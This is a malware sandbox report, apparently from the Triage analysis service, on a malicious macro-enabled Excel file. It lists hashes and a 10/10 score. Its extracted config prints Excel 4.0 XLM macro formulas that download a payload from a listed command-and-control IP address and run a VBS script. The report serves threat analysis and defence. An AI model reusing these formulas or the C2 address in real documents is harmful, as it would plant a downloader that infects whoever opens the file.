f9558b5f56819af8fcb53cc4ad656d9a | Triage

Submit
Reports

Overview

overview

Static

static

f9558b5f56...a.xlsm

windows7-x64

f9558b5f56...a.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

f9558b5f56819af8fcb53cc4ad656d9a.xlsm

Resource

win7-20231215-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

f9558b5f56819af8fcb53cc4ad656d9a.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

7 signatures

150 seconds

General

Target

f9558b5f56819af8fcb53cc4ad656d9a
Size

6KB
MD5

f9558b5f56819af8fcb53cc4ad656d9a
SHA1

edab72621aa8ef077f2f7c1e4d1865f2526fa30d
SHA256

5dd9c11190bb8ceb2a5c55ca528527b1abb3317bad8fb15d0f37698a27ce82c1
SHA512

a8bb6055656e988ee9c51c5582515d9173f976327edf378a46880d62ebe2e4b99b1f3268ac68d9caabc86ebe03dbbef888bf29fc95a12d13c109c3d14a413039
SSDEEP

192:NDSpuSXbrA2OmmfRu8UhHFBFYuob98y4n+h:NuuoM2wI1FYlb98y4C

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

f9558b5f56819af8fcb53cc4ad656d9a
.xlsm office2007

© 2018-2025

Terms | Privacy